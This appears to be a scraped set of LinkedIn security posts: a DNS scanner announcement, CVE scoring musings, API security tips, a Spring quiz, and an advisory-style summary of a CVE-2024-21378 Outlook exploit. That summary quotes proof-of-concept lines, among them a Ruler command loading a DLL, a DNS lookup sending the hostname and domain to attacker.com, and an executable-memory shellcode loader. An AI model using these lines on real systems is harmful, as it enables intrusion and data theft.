Trickest, Inc.’s Post

I developed Pingv4 DNS Checker to quickly scan DNS records and subdomains, providing a reliable and user-friendly tool for system administrators and security professionals. It is designed to be fast, accurate, and lightweight. Features: • 🚀 Fast Subdomain Scanning: Quickly queries multiple subdomains and lists the results. • 📡 Accurate IP Detection: Identifies the IP addresses of subdomains with precision. • 🖥️ User-Friendly Output: Offers clean, tab-aligned, and easy-to-read output. • ⚙️ Lightweight and Efficient: Built with minimal dependencies for high performance. Use Cases: • Analyzing DNS to identify potential security vulnerabilities. • Verifying IP mappings for subdomains. • Network and system configuration analysis. How to Use? Perform DNS scanning easily with simple CLI commands: dns-scan.exe --domain=google.com For more details and source code, visit GitHub: https://lnkd.in/ddCRMVPW

Hey security teams! Interested in streamlining how you create rules and maintain sophisticated logic in your rule sets? Impart Security’s newest update, Security Functions, is a powerful approach to modularizing security policies and rules at runtime. You can effortlessly incorporate complex logic into runtime rule scripts in Impart’s pro-code Rule Builder (learn more at try.imp.art/rule-builder) and seamlessly execute traditionally cumbersome tasks like checksum validations, password strength evaluations, value hashing with various encodings, and more. Examples of Security Functions include: ✅ Validations for Vehicle Identification Numbers (VIN) ✅ Social Security Numbers (SSN) ✅ Checks for weak passwords ✅ SHA2 hashing ✅ Data redactions Contact us at try.imp.art to discover how Security Functions can help you easily access and maintain sophisticated logic and follow us here to stay updated with the latest news and product releases. 🔗 Link to the full product update in the comments.

Disclaimer: I use the NVD list just as an example, there are others online. In those days I wanted to know how the score for a CVE is decided. This because I reviewed a couple of CVEs and I found them, for the context I had, not that relevant despite their score. My naive idea was like: there is an individual or a group that discovers the vulnerability, then there is a public debate (logged) about how important the vulnerability is and then a consensus would emerge to define the score. Not quite. The one (or group) discovering the CVE goes through a formalized process, the CVSS (Common Vulnerability Scoring System). The CVSS provides a formula and variables. The discoverer assigns a value to the variables, providing some justification for it, and then a score is produced. Now the value of some variables could increase the final score if there are some qualifications that allow the attack to be more critical. Making up an example: "this attack is possible provided that the attacker has already access to the following things <list of requirements>". Therefore a CVE is not necessarily relevant if the requirements cannot be easily satisfied in a specific infrastructure. So far good though. One has to start somewhere. Having the discovering person/team giving an initial score is fine. Anyway, since it seems to me that such publications are like publications in science (or even patents), I would expect a sort of review of the vulnerability and the associated score. In the best case a peer review, with a logged public discussion. Even without public reviews it should be fine anyway. There are at least organizations that review the submitted CVEs, right? Yes. The major CVEs lists, for example NVD from NIST, have in background teams that review the CVEs as shown in https://lnkd.in/e6Sq8XNR. Anyway since time is limited, the reviewing team is possibly overworked, there are a ton of unreviewed CVEs, the CVEs are about many products in IT (that may or may not be easily procured for testing) and so on, it is possible that the reviewing team cannot really spend that much time on each CVEs - unless is a very notable one. The NVD dashboard also shows numbers about the status of CVEs (kudos to them) here https://lnkd.in/efiwwfsm. One can read: CVEs received by NVD in the last year: 12126 ; analyzed: 4478. That means that there is also quite the backlog in analyzing CVEs and that the reviewing team is never short of work. What do I want to say with all this? I have the feeling, for the information I could collect and read, that most scores in CVEs aren't "the gospel" so to speak. It seems possible that due to the sheer amount of work, unless something is major and starting a very large public debate, the final score could be simply very similar to the original score given by those that discovered the vulnerability. That could explain why some critical CVEs often do not seem relevant (aside from specific contexts).

Requirements have grown for increasingly longer and more complex passwords - and not without very good reason! This article includes a must-watch brief video that provides a startling demonstration of why we all need strong passwords.

In this meetup, we delve into the often hidden security risks in software development. Using a low-code platform as an example, we illuminate how thorough security analysis can expose significant flaws that would otherwise remain undiscovered. These insights underscore that no type of software - whether SaaS, low-code, or another application - is immune to potential security threats. Our discussion aims to foster a deeper understanding of why it's crucial not to rely solely on surface promises. We invite participants to explore together how critical evaluations and a healthy dose of skepticism can contribute to developing safer and more trustworthy software solutions. https://lnkd.in/dranpmJz

Friday Quizzz! How does the @EnableWebSecurity annotation work in Spring Security? Write the answer in the comments. A. It allows to read the HttpSecurity configuration bean B. Enables Spring Security for all the endpoints C. It enables the default authentication of Spring Security D. It is mandatory when using Spring Security BTW, the answer of the last week is: <dependencies>: Declares the actual dependencies for a project; <dependencyManagement>: Provides version and configuration details that child projects can inherit when they declare the dependency. For more tips, follow me on: https://lnkd.in/en84AtRh   Don't forget to like, share and comment!

💡𝗨𝗻𝗱𝗲𝗿𝘀𝘁𝗮𝗻𝗱𝗶𝗻𝗴 𝗮𝗻𝗱 𝗙𝗶𝘅𝗶𝗻𝗴 𝟲 𝗖𝗼𝗺𝗺𝗼𝗻 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗜𝘀𝘀𝘂𝗲𝘀 𝗶𝗻 𝗔𝗣𝗜𝘀 𝗕𝗿𝗼𝗸𝗲𝗻 𝗔𝘂𝘁𝗵𝗲𝗻𝘁𝗶𝗰𝗮𝘁𝗶𝗼𝗻 allows unauthorized access due to weak authentication. 𝗛𝗼𝘄 𝗧𝗼 𝗙𝗶𝘅: - Use strong methods like OAuth 2.0. - Implement multi-factor authentication (MFA). 𝗨𝗻𝗿𝗲𝘀𝘁𝗿𝗶𝗰𝘁𝗲𝗱 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲 𝗖𝗼𝗻𝘀𝘂𝗺𝗽𝘁𝗶𝗼𝗻 can lead to denial of service attacks. 𝗛𝗼𝘄 𝗧𝗼 𝗙𝗶𝘅: - Implement rate limiting. - Set resource quotas. 𝗨𝗻𝗿𝗲𝘀𝘁𝗿𝗶𝗰𝘁𝗲𝗱 𝗔𝗰𝗰𝗲𝘀𝘀 to sensitive operations allows unauthorized actions. 𝗛𝗼𝘄 𝗧𝗼 𝗙𝗶𝘅: - Use role-based access control (RBAC). - Perform authorization checks. 𝗦𝗲𝗿𝘃𝗲𝗿-𝗦𝗶𝗱𝗲 𝗥𝗲𝗾𝘂𝗲𝘀𝘁 𝗙𝗼𝗿𝗴𝗲𝗿𝘆 (𝗦𝗦𝗥𝗙) tricks the server into making harmful requests. 𝗛𝗼𝘄 𝗧𝗼 𝗙𝗶𝘅: - Validate and sanitize inputs. - Whitelist allowed domains. 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗠𝗶𝘀𝗰𝗼𝗻𝗳𝗶𝗴𝘂𝗿𝗮𝘁𝗶𝗼𝗻 leaves APIs vulnerable. 𝗛𝗼𝘄 𝗧𝗼 𝗙𝗶𝘅: - Keep software updated. - Disable unnecessary features. 𝗜𝗺𝗽𝗿𝗼𝗽𝗲𝗿 𝗨𝘀𝗲 𝗼𝗳 𝗟𝗼𝗴𝗼𝘂𝘁 keeps tokens valid even after logout. 𝗛𝗼𝘄 𝗧𝗼 𝗙𝗶𝘅: - Expire or invalidate tokens on logout. - Implement middleware for token validation. Find the blog link in the comment and follow Osama Haider for more insights! 🔥

The CVE-2024-21378 vulnerability in Microsoft Outlook allows remote code execution through malicious COM forms. Security researchers have released proof-of-concept code demonstrating how to exploit this flaw. The example code, written in C, is compiled into a DLL that is loaded into Outlook using the "Ruler" tool with the command: ruler [auth-params] form add-com [attack-params] --dll ./test.dll Once loaded, the DLL sends the PC's hostname and domain name to a malicious DNS resolver, as seen in this excerpt: std::wstring dns_resolve_address = L"new.d%USERDOMAIN%.u%COMPUTERNAME%.attacker.com"; It then allocates memory, copies a payload into it, and executes it in a separate thread: LPVOID payload_memory = VirtualAlloc(NULL, payload_zx, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy_s(payload_memory, payload_zx, rawData, payload_zx); g_threadH = CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)((ptr_uint)payload_memory + (ptr_uint)payload_EP_offset), dns_name_allocated, 0, NULL); Although the payload in this PoC is harmless, in a real attack it would allow executing arbitrary code. Administrators should update Outlook with the latest patches. Antivirus developers can use this code to create and test detections. Through a collaborative approach between researchers and vendors, we can strengthen security against threats like CVE-2024-21378. Stay informed about the latest advisories and apply recommended mitigations. https://lnkd.in/eN-yjHjp https://lnkd.in/eG4H3PxR

Understanding ls -Zd /var/ftp Breakdown of the Command ls: This is the command to list directory contents. -Z: This option displays security context information. This is often used in systems with SELinux enabled to view security labels associated with files and directories. -d: This option displays directory information without listing the contents of the directory. /var/ftp: This is the directory you want to list. It's commonly used as the root directory for FTP services. What the Command Does In essence, ls -Zd /var/ftp will: List the directory /var/ftp. Display the security context information (if SELinux is enabled) for /var/ftp. Avoid listing the contents of the directory itself. Why Use This Command? Security Checks: If SELinux is configured, checking the security context can help identify potential security issues. Directory Information: You might use it to quickly check the permissions, ownership, and security context of the /var/ftp directory without seeing its contents. Debugging FTP Issues: Understanding the directory's properties can aid in troubleshooting FTP-related problems. Additional Notes If SELinux is not enabled, the -Z option might not produce any additional output. To list the contents of /var/ftp with security context information, you would use ls -Z /var/ftp.

On October 25, 2024, Spring announced CVE-2024-38821, a critical vulnerability that allows attackers to access restricted resources under specific conditions. I just published an article detailing this vulnerability to help you better understand and determine if you are impacted. While RASP can be useful, it may not detect the vulnerability. The effectiveness of ADRs may also differ based on implementation. A proof of concept (PoC) is available here: https://lnkd.in/dnNJQQai Link to the article: https://lnkd.in/dNNpWjMx